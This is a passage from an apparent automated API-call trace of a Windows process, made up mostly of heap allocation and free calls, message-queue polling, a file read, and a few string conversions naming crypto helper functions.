[0033.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0033.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.586] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0033.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0033.587] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0033.587] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0033.587] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0033.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0033.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0033.588] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0033.588] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x4911, lpOverlapped=0x0) returned 1 [0033.589] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0033.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4911) returned 0x8affc0 [0033.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0033.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0033.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0033.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0033.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4911) returned 0x8b48e0 [0033.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0033.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.590] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0033.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.590] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4911) returned 0x8affc0 [0033.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0033.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0033.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0033.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.591] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0033.591] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.591] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0033.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4911) returned 0x8affc0 [0033.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0033.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0033.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0033.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc70 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0033.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4911) returned 0x8b9200 [0033.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0033.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0033.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0033.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0033.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.594] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0033.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0033.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0033.594] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0033.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0033.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.594] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0033.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da358 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0033.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889490 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0033.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.595] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0033.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0033.595] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0033.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0033.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0033.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0033.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0033.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0033.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0033.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0033.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0033.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.596] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0033.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0033.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0033.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0033.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0033.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0033.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0033.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0033.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0033.597] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0033.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0033.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0033.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0033.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0033.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.597] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0033.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c820 [0033.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.597] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0033.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0033.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.597] HeapFree 